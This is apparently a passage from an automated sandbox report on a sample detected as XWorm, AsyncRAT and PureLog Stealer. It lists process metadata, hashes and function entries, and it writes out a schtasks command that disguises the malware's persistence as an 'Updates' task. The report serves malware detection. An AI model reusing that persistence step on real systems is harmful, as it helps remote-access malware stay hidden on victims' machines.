Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	02:35:10
Start date:	18/07/2024
Path:	C:\Users\user\AppData\Roaming\pNYyTm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\pNYyTm.exe
Imagebase:	0xfd0000
File size:	479'744 bytes
MD5 hash:	7FDA9F799B84A7ED802F7127869D5E81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:35:11
Start date:	18/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6616b0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:35:14
Start date:	18/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"
Imagebase:	0x910000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:35:15
Start date:	18/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:35:15
Start date:	18/07/2024
Path:	C:\Users\user\AppData\Roaming\pNYyTm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\pNYyTm.exe"
Imagebase:	0x9a0000
File size:	479'744 bytes
MD5 hash:	7FDA9F799B84A7ED802F7127869D5E81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:36:06
Start date:	18/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	7

Executed Functions

Function 0144B068 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0144B2BE

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2635aa51d5a1775a49800a65abb60139788e8da55586c3a9f195db277989f729
Instruction ID: acada99ceb5392e0cb699f1e2ab4c1f71294e9a2f6dacb43d218c5c75d457b88
Opcode Fuzzy Hash: 2635aa51d5a1775a49800a65abb60139788e8da55586c3a9f195db277989f729
Instruction Fuzzy Hash: 117134B0A00B058FE724DF6AD44475ABBF1FF48244F108A2ED59AD7B60D774E846CB90

Function 0144590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014459C9

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3607a031eaebb27ef1cf8f0ba748728ee6225b326b0b437607c3da0ee91c88f2
Instruction ID: 1447961041ad827e96bbcd1db28e6cea1509bc576cb45c12347328ef397b2495
Opcode Fuzzy Hash: 3607a031eaebb27ef1cf8f0ba748728ee6225b326b0b437607c3da0ee91c88f2
Instruction Fuzzy Hash: E641C4B1C00719CFEB24DFA9C884BDEBBB5BF49304F24815AD409AB251DBB56986CF50

Function 014444C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014459C9

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0d760da579466df98b5f92d8d95f4d00691b3d2f8d2382d28cb24bdc5658e7e5
Instruction ID: 596f849f3d7c2dd522cde89bb327b302e0c7a75c1f1910cf640b9fff490fa363
Opcode Fuzzy Hash: 0d760da579466df98b5f92d8d95f4d00691b3d2f8d2382d28cb24bdc5658e7e5
Instruction Fuzzy Hash: AB41D470C00719CFEB24DFA9C884BDEBBB5BF49304F20815AD408AB251DBB16945CF90

Function 0144AF54 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D50E,?,?,?,?,?), ref: 0144D5CF

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: db8d8bf20acfecbd8b4283ff2c96266e00eec5824aabf164cfd55e37b76986e8
Instruction ID: 90f075f7aeb97950ababb1bfcd53619c7afa623c4b974db430d63fed1d1f622c
Opcode Fuzzy Hash: db8d8bf20acfecbd8b4283ff2c96266e00eec5824aabf164cfd55e37b76986e8
Instruction Fuzzy Hash: B621E3B5D00359AFDB10CF9AD984BEEBBF4EB48314F14841AE914A7310D374A945CFA5

Function 0144D540 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D50E,?,?,?,?,?), ref: 0144D5CF

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: be3ea21a49e3f1077da4a64a8804a17cd741580a4afeeb5bdf27c1f568146aa9
Instruction ID: def96d9a0891a0c2e7d35504c9c2105fa11d04d2a7a2ca4bee7119e9a29fb8ac
Opcode Fuzzy Hash: be3ea21a49e3f1077da4a64a8804a17cd741580a4afeeb5bdf27c1f568146aa9
Instruction Fuzzy Hash: 0E21E5B5D003599FDB10CF9AD984BDEBBF4EB48314F24841AE914A7310D374A945CFA4

Function 0144AD88 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0144B339,00000800,00000000,00000000), ref: 0144B54A

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e70a6f2ce733adb1007b1ccb23658d366e3b05a571f6209b675c2ea39e485920
Instruction ID: 7fbb42a83ca0704ddb92294a9b48c5193bd0d702469938e5a7e0be45eeff9bc8
Opcode Fuzzy Hash: e70a6f2ce733adb1007b1ccb23658d366e3b05a571f6209b675c2ea39e485920
Instruction Fuzzy Hash: 481114B69003098FEB24CF9AD444BDEFBF4EB88314F14842AD919A7310C375A945CFA4

Function 0144B4DA Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0144B339,00000800,00000000,00000000), ref: 0144B54A

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c7d260755356e0e01ee42fad6e8d0ce61002c7117f701d8ac9a59fc390da780
Instruction ID: 8abd78a53dc44642ebeb5b586ef99174f55800d324b9747e047e7d0630ee99b6
Opcode Fuzzy Hash: 8c7d260755356e0e01ee42fad6e8d0ce61002c7117f701d8ac9a59fc390da780
Instruction Fuzzy Hash: 0C11E2B69003499FDB14CF9AD844BDEFBF4EB88314F14842AD919A7210C379A545CFA5

Function 0144B258 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0144B2BE

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cf4f7f2cc7ba193dc933954759f83938589b9ce40dba2dfdcd56a4fa395f1737
Instruction ID: 48e3d10c713a6d34da6f103a6d5d360c0c50806e410905424e62ade1cc68b84c
Opcode Fuzzy Hash: cf4f7f2cc7ba193dc933954759f83938589b9ce40dba2dfdcd56a4fa395f1737
Instruction Fuzzy Hash: 7511DFB6C006498FDB24CF9AD444BDEFBF4EB88314F14842AD929A7610C375A545CFA5

Function 0596F3C8 Relevance: 1.4, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r, xrefs: 0596F638

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 1406748873067cbd84d8d34413278d3ccf659ce69a87ff5c5eeaa5b36491bd89
Instruction ID: b28c029fb0bcf2084166fcd1e961955d1b64465b69ea7f6d0c5c48f8d34425cd
Opcode Fuzzy Hash: 1406748873067cbd84d8d34413278d3ccf659ce69a87ff5c5eeaa5b36491bd89
Instruction Fuzzy Hash: 49410B75909208DBCB04CFA9E5445FDBBBAFB8E301F10E465D40AA7629CB359949CF50

Function 059634B0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5e3abd4dc4cf47a2d84f60ebb94188e28e0fbca0f0a7bbca55d037d76ad357
Instruction ID: 63234beefb2ee09e64f0be1443e6fd48571b89f006fcb1672eb89668cc3dcf86
Opcode Fuzzy Hash: 8c5e3abd4dc4cf47a2d84f60ebb94188e28e0fbca0f0a7bbca55d037d76ad357
Instruction Fuzzy Hash: 4A51D074B002068FDB11EBB9984897FBBF7FFC42207248969E459D7391EB309D058751

Function 05967C94 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da92904c4eafc56d620272729597effeff755cbc369e34c249824554f948a22
Instruction ID: f565be2c9a3e0a6303b562623c1ec8f5b80ca2ad66104e4c801f8c870ebf0490
Opcode Fuzzy Hash: 4da92904c4eafc56d620272729597effeff755cbc369e34c249824554f948a22
Instruction Fuzzy Hash: 5D41D2B5D003198BDB24DF9AC584ADDFBF5BF48304F648529D409AB200D7B56A8ACF90

Function 0596AB90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d4b4925d473bbd6dae20137c33e3d00f8512f794e25e244622944e819845e4
Instruction ID: 7a4b48f45248ed312e9b5caf148fee85ae66bc35573792afedefb5a1adfa3381
Opcode Fuzzy Hash: 24d4b4925d473bbd6dae20137c33e3d00f8512f794e25e244622944e819845e4
Instruction Fuzzy Hash: 3A316174E0011E8FDB40EFA9C9957AFBBB6FB88314F205165D519A3388DB355C05CBA0

Function 0129D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4218d76e2d2fb7500c1c596a8e9715b700ae899170cf39d84bdf50d69d97086a
Instruction ID: 00ce6b7f057a0c4ccb0808f28748319239f67f5865f178bf3da10db29f0911fb
Opcode Fuzzy Hash: 4218d76e2d2fb7500c1c596a8e9715b700ae899170cf39d84bdf50d69d97086a
Instruction Fuzzy Hash: 4B2167B2510248DFDF15DF58E9C0B26BF61FB88318F24C16DE9090B256C336D446DBA2

Function 0129D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7c591213a5b82fc6a62c7744124956ca1c6f2fd2ee9d56b0a6cf8a5b265ece
Instruction ID: a6ecb4253218dcd13673e312bf01a2c2b3431601ea4e3320fe763fae6be3bdaa
Opcode Fuzzy Hash: 1f7c591213a5b82fc6a62c7744124956ca1c6f2fd2ee9d56b0a6cf8a5b265ece
Instruction Fuzzy Hash: 8D2148B5510208DFDF05DF48C9C0B66BB65FB84324F24C16DD90A0B246C376E446DAA2

Function 05968774 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8ba44038a08230fc9403712705bcdbc8bd49f762fdc4f036ed86fb1e891207
Instruction ID: ebd65babccef5a477c6fdc8ee568fe6358a8dcb82e1a3e01e00ef04fa3ea1ece
Opcode Fuzzy Hash: 2c8ba44038a08230fc9403712705bcdbc8bd49f762fdc4f036ed86fb1e891207
Instruction Fuzzy Hash: 5211E436E102159BDF04EFA5DC45AAE7BBAFFC5215F04C526E518EB250DB30A9098B90

Function 012AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eba39c4f62f36747eac0c76246995dcd183b41a178d2352a9e9cf4f10fc0695
Instruction ID: cfea724ba2c73af0c4e0d09056fbd89836b4d5e44714545683657e2ec42f7d21
Opcode Fuzzy Hash: 5eba39c4f62f36747eac0c76246995dcd183b41a178d2352a9e9cf4f10fc0695
Instruction Fuzzy Hash: 012176B1654308DFDB15DF64D8C0B26BBA1FB88314F64C56DD90A0B646C37BD807CA62

Function 012AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03457db3a5d93a5b810dc65f9d82e961940325113f500de01ecf0a3410335165
Instruction ID: 8e9e99312525ba52eba66efee83cb6f1bfa5306668d67694fb1e8337e148c025
Opcode Fuzzy Hash: 03457db3a5d93a5b810dc65f9d82e961940325113f500de01ecf0a3410335165
Instruction Fuzzy Hash: A12176B1514308EFEB01DF94C9C0B26BBA1FB84324F64C56DE90A0B653C37AD806CA61

Function 0596789C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4786c5d97df61822a1c58681b04f30a05667eb0d610ad580e12a0b53a63da7ff
Instruction ID: 89e38d4744d1c6b5395471c3fe5dd8af8aa92c7ecd41efb93fadcb47384e7c8c
Opcode Fuzzy Hash: 4786c5d97df61822a1c58681b04f30a05667eb0d610ad580e12a0b53a63da7ff
Instruction Fuzzy Hash: E331E3B0D01318DFDB20DFAAC588B9EBBF9EB48714F648419E404BB240C3B55889CF94

Function 05968BE8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9abc7f5d6de6d5eacfc47e3edb2d9bd985fe8b72def368bd7b6e08fde90540
Instruction ID: 501cb7f71a82276ea226b996267a19a0975c0113f17be3faaddecd039cb44d49
Opcode Fuzzy Hash: ee9abc7f5d6de6d5eacfc47e3edb2d9bd985fe8b72def368bd7b6e08fde90540
Instruction Fuzzy Hash: 3521A174B102058FCB10EB78C4689AFBBFAEF81214F108969E506DB350EF74ED098B91

Function 0596B480 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd40ecbe8425fbce3d12fb3bb9aa60f72801db4dca0ae3b1b41f0789d635a017
Instruction ID: 430330632d45d444aff581c5b0313b3715232ee98ceab1a65f3b723c1b05441e
Opcode Fuzzy Hash: cd40ecbe8425fbce3d12fb3bb9aa60f72801db4dca0ae3b1b41f0789d635a017
Instruction Fuzzy Hash: 14110330B042088FCB14DB69C911BAA7B7BEF86300F6480E6D106CB3A6DE31DC05CB91

Function 012AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1d9b5c55701af71a3b4cc27d9d2dd905d4ffec5988957dce9ea1af94fe61af
Instruction ID: 54c170649a533eadcf75a729e5a51b800c40468ae0994764c332a2576528aad3
Opcode Fuzzy Hash: ae1d9b5c55701af71a3b4cc27d9d2dd905d4ffec5988957dce9ea1af94fe61af
Instruction Fuzzy Hash: 8B21B0754483849FCB03CF24D994711BF71EB46314F28C5EAD9898F6A7C33A980ACB62

Function 05969F50 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818ef0039ed6d19c28a3f4190888cf215f68e1c4f39a3bd9d1b7521a1500654a
Instruction ID: 0040d7c511b3bc8b86340107e135ef8259ad364ac0a9f9322a690a23692d116a
Opcode Fuzzy Hash: 818ef0039ed6d19c28a3f4190888cf215f68e1c4f39a3bd9d1b7521a1500654a
Instruction Fuzzy Hash: 1911E574B143489FDB08EF74C81AAAD7BFDEB85205F1044AAE805C7251EA35EE069711

Function 0129D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: 2f88cfe3e7ada778777546edfc70d6e694cbb8931910e3f2eeeb786c82d6f5aa
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 4111DF76404284CFCF12CF58D5C0B16BF71FB84314F24C6A9D9490B656C33AD45ADBA1

Function 0129D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: a0152c4432756a66dc39ac4bda9f055a4de2f36966d079051bd2ac0e55f9528e
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 8811CD76404284CFDF12CF48D5C0B56BF71FB84224F2482A9D9090B656C33AE456DBA1

Function 05968784 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae98b92b78396618bcc58cd98c1fff981c5bec04447b408b4b2664aaa5283fa2
Instruction ID: 891ddaaf3d636635ab39229e4e74b542876fd353753ef86b71814c3cf62cd505
Opcode Fuzzy Hash: ae98b92b78396618bcc58cd98c1fff981c5bec04447b408b4b2664aaa5283fa2
Instruction Fuzzy Hash: 3F2103B6904349DFCB20CF9AD984BDEBBF4FB49310F548429E919A7210C374A954CFA5

Function 0596DAF8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828237441800e4ade8ca06846bb7eca0f97da1439f92ef8a81261a02e0cdea5b
Instruction ID: 329734a98470989382d7580f7f425df1023a14ea338d5447e89400850e6e1350
Opcode Fuzzy Hash: 828237441800e4ade8ca06846bb7eca0f97da1439f92ef8a81261a02e0cdea5b
Instruction Fuzzy Hash: 6011B4B4E1425C8BEB18DFAAC8546EEFBFABF89300F04C02AC415AB258DB741845CB50

Function 012AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 480022d4170e1f24a109b0c63f48404485d63cb4445eecf1af7fd88c1654d18e
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 6611BB75504284DFDB12CF54C5C4B15BBB1FB84324F28C6AAD9494BAA7C33AD40ACB61

Function 0596E990 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0152786110b10aca3a13bfa44cd975d8286ee41ecf184b7bc4264e1326310af8
Instruction ID: 990416ed8634135d84c5052664fa3af3571c47c7e1241171b41a0eea31254fe1
Opcode Fuzzy Hash: 0152786110b10aca3a13bfa44cd975d8286ee41ecf184b7bc4264e1326310af8
Instruction Fuzzy Hash: 5C1190B5D006589BEB18CFA7D84579EFEF7AFC8300F14C06AD409A6254DB7509458F90

Function 05967C4C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ca6b8930f04da8effcca480054fa7e6c5c996d60878c980cd1e9bce9d8b1ac
Instruction ID: 1fa5735c63650307d23f46167801a73f211cb3b958a81c2a5ad740921ad80284
Opcode Fuzzy Hash: 88ca6b8930f04da8effcca480054fa7e6c5c996d60878c980cd1e9bce9d8b1ac
Instruction Fuzzy Hash: 6211F2B59043498FCB20DF9AD584BDEFBF4EB48320F24841AD959A7250C374A949CFA5

Function 059688AC Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5a359249cf3f88f8ba14ddb8cce698c738af18f7e38d6d8fcdb9f6eeaa87f3
Instruction ID: 8656a70d6749abbf3b4d6ba0eae2682b9f2dc4808fcb2bb2e4fccd4dabefbab7
